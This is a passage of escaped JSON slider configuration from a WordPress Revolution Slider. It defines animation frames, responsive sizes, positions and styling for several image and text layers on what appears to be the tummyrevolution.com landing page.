0\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"6\":{\"text\":\"Image 6\",\"alias\":\"Logo\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic81.png\",\"imageId\":4599},\"size\":{\"width\":{\"d\":{\"v\":\"850px\",\"e\":true},\"n\":{\"v\":\"720px\",\"e\":true},\"t\":{\"v\":\"720px\"},\"m\":{\"v\":\"306px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"150px\",\"e\":true},\"n\":{\"v\":\"127px\",\"e\":true},\"t\":{\"v\":\"127px\"},\"m\":{\"v\":\"54px\",\"e\":true}},\"originalWidth\":850,\"originalHeight\":150,\"aspectRatio\":{\"d\":{\"v\":5.66666666666666696272613990004174411296844482421875},\"n\":{\"v\":5.66666666666666696272613990004174411296844482421875},\"t\":{\"v\":5.66666666666666696272613990004174411296844482421875},\"m\":{\"v\":5.66666666666666696272613990004174411296844482421875}}},\"position\":{\"x\":{\"d\":{\"v\":\"-2px\",\"e\":true},\"n\":{\"v\":\"-3px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-50px\",\"e\":true},\"n\":{\"v\":\"-89px\",\"e\":true},\"t\":{\"v\":\"-91px\",\"e\":true},\"m\":{\"v\":\"-101px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"7\":{\"text\":\"Create a stunning online presentation that\\u2019s sure to be in perfect shape! Succulents lets you do this quickly & easily.\",\"alias\":\"It is a long establi...\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"v\":\"559px\",\"e\":true},\"n\":{\"v\":\"532px\",\"e\":true},\"t\":{\"v\":\"532px\",\"e\":true},\"m\":{\"v\":\"313px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"55px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"559px\",\"originalHeight\":\"55px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-15px\",\"e\":true},\"n\":{\"v\":\"-11px\",\"e\":true},\"t\":{\"v\":\"-1px\",\"e\":true},\"m\":{\"v\":\"-2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"48px\",\"e\":true},\"n\":{\"v\":\"11px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-10px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#c8c8c8\",\"e\":true},\"n\":{\"v\":\"#c8c8c8\",\"e\":true},\"t\":{\"v\":\"#c8c8c8\",\"e\":true},\"m\":{\"v\":\"#c8c8c8\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"19px\",\"e\":true},\"t\":{\"v\":\"19px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"27px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"24px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#c8c8c8\",\"e\":true},\"n\":{\"v\":\"#c8c8c8\",\"e\":true},\"t\":{\"v\":\"#c8c8c8\",\"e\":true},\"m\":{\"v\":\"#c8c8c8\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"8\":{\"text\":\"Image 8\",\"alias\":\"Image 8\",\"uid\":8,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic51.png\",\"imageId\":4607},\"size\":{\"width\":{\"d\":{\"v\":\"194px\",\"e\":true},\"n\":{\"v\":\"167px\",\"e\":true},\"t\":{\"v\":\"201px\",\"e\":true},\"m\":{\"v\":\"91px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"183px\",\"e\":true},\"n\":{\"v\":\"158px\",\"e\":true},\"t\":{\"v\":\"190px\",\"e\":true},\"m\":{\"v\":\"86px\",\"e\":true}},\"originalWidth\":194,\"originalHeight\":183,\"aspectRatio\":{\"d\":{\"v\":1.0601092896174864055325315348454751074314117431640625},\"n\":{\"v\":1.0601092896174864055325315348454751074314117431640625},\"t\":{\"v\":1.0601092896174864055325315348454751074314117431640625},\"m\":{\"v\":1.0601092896174864055325315348454751074314117431640625}}},\"position\":{\"x\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"-559px\",\"e\":true},\"t\":{\"v\":\"9px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"262px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"-2px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"9\":{\"text\":\"Image 9\",\"alias\":\"Image 9\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic61.png\",\"imageId\":4608},\"size\":{\"width\":{\"d\":{\"v\":\"127px\",\"e\":true},\"n\":{\"v\":\"99px\",\"e\":true},\"t\":{\"v\":\"99px\",\"e\":true},\"m\":{\"v\":\"69px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"77px\",\"e\":true},\"n\":{\"v\":\"60px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"42px\",\"e\":true}},\"originalWidth\":127,\"originalHeight\":77,\"aspectRatio\":{\"d\":{\"v\":1.649350649350649344881958313635550439357757568359375},\"n\":{\"v\":1.649350649350649344881958313635550439357757568359375},\"t\":{\"v\":1.649350649350649344881958313635550439357757568359375},\"m\":{\"v\":1.649350649350649344881958313635550439357757568359375}}},\"position\":{\"x\":{\"d\":{\"v\":\"534px\",\"e\":true},\"n\":{\"v\":\"-137px\",\"e\":true},\"t\":{\"v\":\"199px\",\"e\":true},\"m\":{\"v\":\"119px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"315px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"0\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 